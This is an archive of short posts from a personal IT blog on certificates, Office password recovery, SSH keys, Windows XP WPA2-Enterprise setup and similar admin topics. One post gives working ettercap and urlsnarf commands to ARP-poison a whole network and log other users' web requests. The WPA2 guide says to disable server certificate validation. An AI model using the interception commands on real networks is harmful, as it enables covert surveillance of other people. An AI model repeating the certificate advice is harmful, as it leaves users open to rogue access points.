Tag Archives: Security

Google SSL Certificates going to 2048-bit

Posted by on May 24, 2013 No comments

Coming Soon! In August 2013, Google will start the process of switching its SSL Certificates over to 2048-bit for its services adding stronger security. This information was made public on Stephen McHenry’s, Director of Information Security at Google Blog.

The completion of this project is set to be completed by the end of the 2013 year.

Quoted on the blog Stephen McHenry writes

Most client software won’t have any problems with either of these changes, but we know that some configurations will require some extra steps to avoid complications. This is more often true of client software embedded in devices such as certain types of phones, printers, set-top boxes, gaming consoles, and cameras.

Stephen McHenry also listed a number of examples of improper validation practices that could lead to the inability of client software to connect to Google using SSL after the upgrade, such as matching any other certificate exactly or hard-coding the expected root certificate.

Change is coming soon! Don’t be left behind.

More detailed information can be found here

Microsoft Office 2013 DocRecrypt Tool

Posted by on May 22, 2013 No comments

Yup! That one employee encrypted his/her Microsoft Office documents and forgot the password or worse has left the company Fortunately Microsoft has a solution for situations such as this and its called Microsoft Office 2013 DocRecrypt Tool.

This tool allows admins to unprotect or change the password on password protected OOXML Word, Excel and PowerPoint files.

The tool gives admins who have configured the Escrow key feature options to get access to password protected files. The admin uses the tool and the private key of the escrow certificate to decrypt the file. Once decrypted the admin can choose between creating an unprotected copy of the file and changing the password of the file.

Is this the first you are hearing about this. Well your in good company as I was just made away of this also. I found out that there are some requirements that you need to meet before you can just download and have a go at recovering those documents. You need to set up client computers for password protection removal.

These configurations take place in Group Policy of the machine(s). So you will need the Office 2013 Administrative Template files (ADMX/ADML) and Office Customization Tool

Microsoft has some nice steps on doing this, so please follow this LINK for further details on setting this up.

How to use Netdom.exe to reset machine

Posted by on May 10, 2013 No comments

That which you do not know, the doing will quickly teach you. – Po (Kung Fu – 1972)

Here is a situation where you have a virtual machine joined to an active directory domain and it’s reverted to an earlier state which then invalidates its domain security key. Rather than removing this machine and joining it again you can regain domain access by simply logging into the machine as a member of the local administration group and run the following command in an elevated command prompt:

netdom.exe resetpwd /s:<Primary DC Name> /ud:<Domain\Username> /pd:<Username Password>

This will update the machines security key on the virtual machine and the domain. And after a reboot of the machine you are able to log in and function a member of the domain again.

More info on netdom commands here: http://technet.microsoft.com/en-us/library/cc785478(v=ws.10).aspx

And a big thanks Michael Girard who posted this as part of my ‘Flashback Friday’ post on Facebook where I had asked people to share what they had learned this week.

Please stop by http://www.facebook.com/jermsmitcom when you have a chance.

Play Minecraft through TOR

Posted by on May 9, 2013 No comments

This little how-to is more of a way to pass socks proxy parameters to a java app, however my focus here is on doing this with the Java game Minecraft over the TOR Network.

Why you ask? Because I wanted to know if it was possible and if I could do it.

Items Needed:

  1. Minecraft Account
  2. Java Installed (Latest Version)
  3. Minecraft installed and up to the current date.
  4. Windows OS – I’m using Windows 8 at this time

Open notepad and add the following values into it:
@ECHO OFF
cd C:\Program Files (x86)\Java\jre7\bin
java -DsocksProxyHost=127.0.0.1 -DsocksProxyPort=9050 –Xmx1024m -jar Minecraft.exe

The above will work with any SOCKS proxy and not limited to TOR. I am using the above as these are the defaults to TOR

Save the file at TOR-Minecraft.bat and run it. If all work as planned you will see the console open followed by the Minecraft UI. You can now connect to any remote server and you should be passing all your data through the TOR network.

Info on Minecraft: https://minecraft.net/

Info on TOR: https://www.torproject.org/

 

 

Did you like this post, please stop by my Facebook Page and give us a Like

SSH into ESXi 5 host using public key authentication

Posted by on May 6, 2013 No comments

CLI

I do this with my other linux host over here @ jermsmit.com so why not with my ESXi 5 hosts. Using OpenSSH Public Key Authentication on ESXi 5 required a few things.

  1. You need to enable SSH
  2. You need an SSH client (I use putty)
  3. If you already have a authorized_keys file handy use it or make a new one
  4. And Filezilla or WinSCP handy will also help.

Now all you need to do is locate the following directory on your ESXi 5 host: /etc/ssh/keys-root and copy your authorized_keys file to this location. Unlike standard linux system where the file is located /.ssh/ ESXi has a different layout.

I used WinSCP to do my file copies to my system here, use whatever you feel is best for you. And that’s about it, you can now ssh into yourself w/o the need of entering your password.

Next I think I will attempt my hand at some scripting to automate some tasks; when I do, you will all be the first to know.

Feel free to leave jermsmit.com and head over to this link on Public-key cryptography. The more you know the better we all are

Windows XP WPA2-Enterprise using IEEE 802.1X

Posted by on May 6, 2013 No comments

On occasions I get a question where someone is trying to connect Microsoft Windows XP to a WPA2-Enterprise level Wireless network using RADIUS authentication.

First I would like inform you that in order to so this you need to be running Service Pack 2; I’d recommend you run Service Pack 3, which is the latest Service Pack for Microsoft Windows XP.

If you are running only Service Pack 2, you will need to install an update for you wireless client, which covers “Wi-Fi Protected Access 2 (WPA2) Provisioning Services – http://support.microsoft.com/kb/893357

Once you are up to date you should be able to simply follow these steps to configure your access to a WPA2 Enterprise Network.

In your Control Panel, double click Network Connections, then right click on your wireless network card and select Properties. The Wireless Network Connection dialog box displays. OR you may also access Wireless Network Connection Properties directly (Step 3) by clicking on the wireless network icon located in your system tray on your desktop (skip Step 2)

On the Wireless Network Connection dialog box under Choose a wireless network, click on the network name. Under Related Tasks, click Change advanced settings.

The Wireless Network Connection Properties dialog box displays.
Click on the Wireless Networks tab. Confirm that “Use Windows to configure my wireless network settings” is checked.
Click on the Add button.

The Wireless network properties dialog box displays.
Next to Network Name type: the name of your network
Under Wireless network key, next to Network Authentication, select WPA2 Enterprise, (other options are: WPA Enterprise, or WPA)
Next to Data encryption, and select AES

Select the Authentication tab.
Next to EAP type, select Protected EAP (PEAP)
Uncheck Authenticate as computer when computer information is available.
Click on the Properties tab.

The Protected EAP Properties dialog box displays.
Uncheck Validate server certificate.
Under Select Authentication Method, assure that Secured password (EAP-MSCHAP v2) is selected.

Confirm that Enable Fast Reconnect is checked. (Depending on your network, if you have multiple access points you may want to enable this)
Click on the Configure button.

The EAP MSCHAPv2 Properties dialog box displays.
Uncheck automatically use my Windows logon name and password. (Applies to machines not joined to a domain)
Click OK

The Enter Credentials dialog box will display and you just need to
Enter your User name and password.
Click [OK]
A bunch of steps, but this should work if setting up manually.

BitTorrent Sync

Posted by on April 23, 2013 No comments

Looking for a free (and new) way to keep folder in sync using a secure and fast method across multiple computers. Well look no further than BitTorrent. It’s been used for many things and the folks over at BitTorrent have given us BitTorrent Sync. No accounts needed, no subscriptions and best of all it works on a technology which is solid and fast, using peer-to-peer technology.

So nothing is stored in the cloud. Did I say its free.  Supporting Windows, Linux and OSX.

Stop over at BitTorrent Labs and give this a go.
Link: BitTorrent Sync

Disable Internet Explorer Enhanced Security Configuration, Server 2012

Posted by on December 5, 2012 No comments

Q. How can I disable Internet Explorer Enhanced Security Configuration in Server 2012?

A.  You disable IE Enhanced Security Configuration by doing the following:

In Server Manager, click on Local Server in the left pane to select the server you are logged into, this will show you in the right pane, in the Properties section

In the middle “grouping” you will notice in the 3rd column the IE Enhanced Security Configuration and what seems to be a link in the 4th column that reads “On”.

Click this link to bring up the security configuration. At this point you can turn them off.

 

ettercap and urlsnarf fun

Posted by on October 17, 2012 No comments

Playing around I downloaded the package dsniff (apt-get install dsniff) to get a bunch of tools. One of the tools are urlsnarf which outputs all requested URLs sniffed from HTTP traffic in CLF (Common Log Format) CLF is used by almost all web servers

You start this by typing the following:

urlsnarf -i eth0
urlsnarf: listening on eth0 [tcp port 80 or port 8080 or port 3128]

As traffic starts to come in using those ports commonly used by HTTP traffic you see something such as this:

 - [18/Oct/2012:00:27:13 -0400] “GET http://www.jermsmit.com/?paged=2 HTTP/1.1″ – - “http://www.jermsmit.com/” “Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4″

But now I want to see what others are doing on my network. This will be accomplished with the help of ettercap. If you do not have it, apt-get install ettercap to download and install.

We are going to keep out urlsnarf running and what we are going to do is run the following command:

ettercap -T -Q -M arp -i eth0 // //

This scan the entire network and allows you to listen in on requests by ARP poisoning… You will see similar information as I shown you above.

Now that is a lot of info; So we are going to trim this down to make it a bit easier to reach and this is done by using the cut command with the urlsnarf to clean things up a bit. This is done by doing the following:

urlsnarf -i eth0 |cut -d\” -f4

And what you get is nice and clear info such as http://www.mtv.com/

So to sum up my steps:

  • urlsnarf -i eth0 (or: urlsnarf -i eth0 |cut -d\” -f4)
  • ettercap -T -Q -M arp -i eth0 // //

And that is about it. Have fun!

 

“Permissions are too open”

Posted by on October 12, 2012 No comments

No man is above the law and no man is below it: nor do we ask any man’s permission when we ask him to obey it. Theodore Roosevelt

You are attempting to automate your ssh session to a remote system using keys and you get the following “Permissions are too open” message.

The problem is, that the private key you are using must remain private. If you permit others to read it, that condition is not satisfied. So when you type something such as ssh -i ~/.ssh/rsa_key admin@jermsmit.com you get the classic Warning: Unprotected Private Key File!

To change this you simply do the following (make it so only you the owner can read and write to the private key:

chmod 600 /home/admin/.ssh/rsa_key

This worked for me, it should work for you.

- Jermal